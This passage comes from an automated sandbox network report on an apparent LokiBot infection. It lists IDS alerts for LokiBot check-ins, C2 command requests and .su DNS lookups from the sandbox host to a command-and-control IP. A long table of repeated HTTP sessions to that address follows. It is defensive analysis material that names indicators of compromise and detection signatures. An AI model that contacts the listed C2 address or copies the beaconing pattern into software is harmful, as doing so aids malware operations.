95.213.216.202192.168.2.680497012025483 11/24/22-19:54:23.783923	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49701	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249733802825766 11/24/22-19:55:23.201569	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49733	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249752802021641 11/24/22-19:56:01.434635	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49752	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249730802825766 11/24/22-19:55:16.067382	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49730	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249732802024313 11/24/22-19:55:21.169470	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49732	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249726802024318 11/24/22-19:55:07.738200	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49726	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249753802025381 11/24/22-19:56:03.443038	TCP	2025381	ET TROJAN LokiBot Checkin	49753	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249732802024318 11/24/22-19:55:21.169470	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49732	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249705802825766 11/24/22-19:54:27.228813	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49705	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249746802825766 11/24/22-19:55:49.078874	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49746	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249755802021641 11/24/22-19:56:06.881877	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249747802025381 11/24/22-19:55:51.131718	TCP	2025381	ET TROJAN LokiBot Checkin	49747	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249699802025381 11/24/22-19:54:15.956073	TCP	2025381	ET TROJAN LokiBot Checkin	49699	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249726802024313 11/24/22-19:55:07.738200	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49726	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249749802021641 11/24/22-19:55:55.139215	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249698802825766 11/24/22-19:54:13.981663	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49698	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249727802021641 11/24/22-19:55:09.788187	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49727	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.852715532014169 11/24/22-19:56:06.802187	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52715	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852079532014169 11/24/22-19:55:21.075805	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52079	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861833532014169 11/24/22-19:55:25.100624	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	61833	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249706802025381 11/24/22-19:54:29.062049	TCP	2025381	ET TROJAN LokiBot Checkin	49706	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249733802021641 11/24/22-19:55:23.201569	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49733	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249751802024318 11/24/22-19:55:59.376338	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49751	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249752802825766 11/24/22-19:56:01.434635	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49752	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249712802025381 11/24/22-19:54:40.926341	TCP	2025381	ET TROJAN LokiBot Checkin	49712	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249711802825766 11/24/22-19:54:38.624655	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49711	80	192.168.2.6	95.213.216.202

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2022 19:54:11.286669970 CET	49697	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:11.345004082 CET	80	49697	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:11.345129967 CET	49697	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:11.348011017 CET	49697	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:11.404728889 CET	80	49697	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:11.404869080 CET	49697	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:11.463299036 CET	80	49697	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:13.168977976 CET	80	49697	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:13.169079065 CET	49697	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:13.169225931 CET	49697	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:13.225949049 CET	80	49697	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:13.894681931 CET	49698	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:13.958650112 CET	80	49698	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:13.958801985 CET	49698	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:13.981662989 CET	49698	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:14.045726061 CET	80	49698	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:14.045902014 CET	49698	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:14.110209942 CET	80	49698	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:15.576119900 CET	80	49698	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:15.576334953 CET	49698	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:15.576581955 CET	49698	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:15.640427113 CET	80	49698	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:15.856637001 CET	49699	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:15.927886963 CET	80	49699	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:15.928071022 CET	49699	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:15.956073046 CET	49699	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:16.027493954 CET	80	49699	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:16.027601004 CET	49699	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:16.098913908 CET	80	49699	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:17.569674015 CET	80	49699	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:17.569780111 CET	49699	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:17.569870949 CET	49699	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:17.640960932 CET	80	49699	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:18.143421888 CET	49700	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:18.200618029 CET	80	49700	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:18.200839043 CET	49700	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:18.249996901 CET	49700	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:18.306715012 CET	80	49700	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:18.306893110 CET	49700	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:18.363512039 CET	80	49700	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:20.029122114 CET	80	49700	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:20.029288054 CET	49700	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:20.981195927 CET	49700	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:21.037904978 CET	80	49700	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:22.019980907 CET	49701	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:22.083102942 CET	80	49701	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:22.083247900 CET	49701	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:22.087876081 CET	49701	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:22.151021957 CET	80	49701	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:22.151093006 CET	49701	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:22.215147972 CET	80	49701	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:23.783922911 CET	80	49701	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:23.784240961 CET	49701	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:23.784240961 CET	49701	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:23.848484039 CET	80	49701	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:24.987267971 CET	49702	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:25.051772118 CET	80	49702	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:25.051894903 CET	49702	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:25.054965973 CET	49702	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:25.119350910 CET	80	49702	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:25.119462013 CET	49702	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:25.185128927 CET	80	49702	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:26.773719072 CET	80	49702	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:26.773926020 CET	49702	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:26.774003983 CET	49702	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:26.838639975 CET	80	49702	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:27.158658981 CET	49705	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:27.225601912 CET	80	49705	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:27.225811958 CET	49705	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:27.228812933 CET	49705	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:27.296253920 CET	80	49705	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:27.296644926 CET	49705	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:27.363353968 CET	80	49705	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:28.634654999 CET	80	49705	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:28.634825945 CET	49705	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:28.634994030 CET	49705	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:28.701540947 CET	80	49705	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:28.980576992 CET	49706	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:29.043751955 CET	80	49706	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:29.043917894 CET	49706	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:29.062048912 CET	49706	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:29.125628948 CET	80	49706	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:29.125740051 CET	49706	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:29.189388037 CET	80	49706	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:30.867233992 CET	80	49706	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:30.867374897 CET	49706	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:30.867445946 CET	49706	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:30.930533886 CET	80	49706	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:31.216176033 CET	49707	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:31.272813082 CET	80	49707	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:31.273060083 CET	49707	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:31.276699066 CET	49707	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:31.333493948 CET	80	49707	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:31.333655119 CET	49707	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:31.390275955 CET	80	49707	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:33.040571928 CET	80	49707	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:33.045016050 CET	49707	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:33.045016050 CET	49707	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:33.101850033 CET	80	49707	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:33.449861050 CET	49709	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:33.506349087 CET	80	49709	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:33.509000063 CET	49709	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:33.518227100 CET	49709	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:33.574716091 CET	80	49709	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:33.575079918 CET	49709	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:33.631447077 CET	80	49709	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:35.412652016 CET	80	49709	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:35.412798882 CET	49709	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:35.420521975 CET	49709	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:35.476921082 CET	80	49709	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:35.841902971 CET	49710	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:35.906202078 CET	80	49710	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:35.907335043 CET	49710	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:35.914326906 CET	49710	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:35.978296995 CET	80	49710	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:35.978511095 CET	49710	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:36.042346001 CET	80	49710	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:37.501775980 CET	80	49710	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:37.502013922 CET	49710	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:37.506547928 CET	49710	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:37.570656061 CET	80	49710	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:38.034216881 CET	49711	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:38.097780943 CET	80	49711	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:38.098017931 CET	49711	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:38.624655008 CET	49711	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:38.688246965 CET	80	49711	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:38.688424110 CET	49711	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:38.752983093 CET	80	49711	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:39.580168962 CET	80	49711	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:39.580349922 CET	49711	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:40.125879049 CET	49711	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:40.191663027 CET	80	49711	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:40.863483906 CET	49712	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:40.922118902 CET	80	49712	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:40.922269106 CET	49712	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:40.926341057 CET	49712	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:40.984411001 CET	80	49712	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:40.984522104 CET	49712	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:41.040863991 CET	80	49712	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:42.610241890 CET	80	49712	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:42.610479116 CET	49712	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:42.610575914 CET	49712	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:42.666831017 CET	80	49712	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:42.949738979 CET	49713	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:43.018057108 CET	80	49713	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:43.018240929 CET	49713	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:43.021096945 CET	49713	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:43.089303970 CET	80	49713	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:43.089515924 CET	49713	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:43.157856941 CET	80	49713	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:44.610304117 CET	80	49713	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:44.610476971 CET	49713	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:44.610532045 CET	49713	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:44.678621054 CET	80	49713	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:45.010751009 CET	49714	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:45.082520008 CET	80	49714	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:45.082861900 CET	49714	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:45.091814041 CET	49714	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:45.165246010 CET	80	49714	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:45.168155909 CET	49714	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:45.239954948 CET	80	49714	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:46.656018972 CET	80	49714	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:46.656297922 CET	49714	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:46.656297922 CET	49714	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:46.728912115 CET	80	49714	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:47.345211029 CET	49715	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:47.402106047 CET	80	49715	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:47.402210951 CET	49715	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:47.405096054 CET	49715	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:47.462661982 CET	80	49715	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:47.462814093 CET	49715	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:47.519625902 CET	80	49715	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:48.216784954 CET	80	49715	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:48.217082024 CET	49715	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:48.217150927 CET	49715	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:48.274569988 CET	80	49715	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:48.639847040 CET	49716	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:48.696883917 CET	80	49716	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:48.697803020 CET	49716	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:48.704817057 CET	49716	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:48.761668921 CET	80	49716	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:48.762324095 CET	49716	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:48.819097042 CET	80	49716	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:50.512831926 CET	80	49716	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:50.513175964 CET	49716	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:50.513844967 CET	49716	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:50.570372105 CET	80	49716	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:50.740741968 CET	49718	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:50.804846048 CET	80	49718	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:50.805008888 CET	49718	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:50.807734966 CET	49718	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:50.871803045 CET	80	49718	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:50.871886015 CET	49718	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:50.935887098 CET	80	49718	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:52.477982044 CET	80	49718	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:52.478251934 CET	49718	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:52.478950977 CET	49718	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:52.542900085 CET	80	49718	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:52.963342905 CET	49719	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:53.026926994 CET	80	49719	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:53.027272940 CET	49719	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:53.033943892 CET	49719	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:53.097426891 CET	80	49719	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:53.097598076 CET	49719	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:53.161052942 CET	80	49719	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:54.654089928 CET	80	49719	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:54.654256105 CET	49719	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:54.654256105 CET	49719	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:54.717772961 CET	80	49719	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:54.886636019 CET	49720	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:54.951272964 CET	80	49720	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:54.951555967 CET	49720	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:54.960633039 CET	49720	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:55.025396109 CET	80	49720	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:55.026843071 CET	49720	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:55.091306925 CET	80	49720	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:56.488534927 CET	80	49720	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:56.488853931 CET	49720	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:56.488986015 CET	49720	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:56.554642916 CET	80	49720	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:56.777586937 CET	49721	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:56.844616890 CET	80	49721	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:56.844764948 CET	49721	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:56.896267891 CET	49721	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:56.963242054 CET	80	49721	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:56.963457108 CET	49721	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:57.030400038 CET	80	49721	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:58.247548103 CET	80	49721	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:58.247638941 CET	49721	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:58.250401020 CET	49721	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:58.317374945 CET	80	49721	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:59.690609932 CET	49722	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:59.757392883 CET	80	49722	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:59.757575989 CET	49722	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:59.769484997 CET	49722	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:59.836227894 CET	80	49722	95.213.216.202	192.168.2.6
Nov 24, 2022 19:54:59.836323977 CET	49722	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:54:59.903049946 CET	80	49722	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:01.407205105 CET	80	49722	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:01.409435987 CET	49722	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:01.409521103 CET	49722	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:01.476908922 CET	80	49722	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:01.626220942 CET	49723	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:01.689275980 CET	80	49723	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:01.689755917 CET	49723	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:01.692450047 CET	49723	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:01.755321026 CET	80	49723	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:01.759412050 CET	49723	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:01.822660923 CET	80	49723	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:03.460306883 CET	80	49723	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:03.460474968 CET	49723	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:03.460474968 CET	49723	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:03.523472071 CET	80	49723	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:03.667985916 CET	49724	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:03.731827021 CET	80	49724	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:03.731956959 CET	49724	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:03.741584063 CET	49724	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:03.805536985 CET	80	49724	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:03.805641890 CET	49724	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:03.869301081 CET	80	49724	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:05.403254986 CET	80	49724	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:05.403405905 CET	49724	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:05.403459072 CET	49724	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:05.467228889 CET	80	49724	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:05.626239061 CET	49725	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:05.690521002 CET	80	49725	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:05.690733910 CET	49725	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:05.694278955 CET	49725	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:05.758435011 CET	80	49725	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:05.758548975 CET	49725	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:05.823070049 CET	80	49725	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:07.447890043 CET	80	49725	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:07.451889992 CET	49725	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:07.452075958 CET	49725	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:07.516593933 CET	80	49725	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:07.677114964 CET	49726	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:07.733545065 CET	80	49726	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:07.735467911 CET	49726	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:07.738199949 CET	49726	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:07.794605970 CET	80	49726	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:07.794753075 CET	49726	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:07.851125002 CET	80	49726	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:09.535229921 CET	80	49726	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:09.535363913 CET	49726	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:09.535423040 CET	49726	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:09.591619015 CET	80	49726	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:09.727186918 CET	49727	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:09.783948898 CET	80	49727	95.213.216.202	192.168.2.6
